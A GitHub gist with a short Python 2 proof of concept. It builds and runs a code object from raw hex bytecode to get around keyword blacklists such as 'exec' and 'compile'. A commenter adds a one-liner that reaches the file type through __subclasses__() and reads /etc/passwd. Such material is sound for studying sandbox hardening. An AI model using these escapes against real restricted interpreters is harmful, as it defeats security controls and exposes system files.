Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
'''
A simple demonstration of obtaining, modifying and executing code objects in python without relying
on commonly blocked keywords such as exec, compile, etc...
-Patrick Biernat.
'''
import __builtin__
mydict = {}
mydict['__builtins__'] = __builtin__
def f():
pass
def mkfunc():
function = type(f)
code = type(f.__code__)
bytecode = "7400006401006402008302006a010083000053".decode('hex')
filename = "./poc.py"
consts = (None,filename,'r')
names = ('open','read')
codeobj = code(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ())
return function(codeobj, mydict, None, None, None)
g = mkfunc()
print g()
@wangst321

This comment has been minimized.

Copy link

wangst321 commented Sep 17, 2014

I have to change the content of bytecode on my machine, in order to make it work.
bytecode = "74000064010064020083020069010083000053"

or segmentation fault

@freddyb

This comment has been minimized.

Copy link

freddyb commented Jul 28, 2015

What kind of blacklist did you try to evade, @pbiernat?

I was wondering if an exploit that uses the method resolution order could be used as well.

TLDR:

(t for t in (42).__class__.__base__.__subclasses__() if t.__name__ == 'file').next()('/etc/passwd').read()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.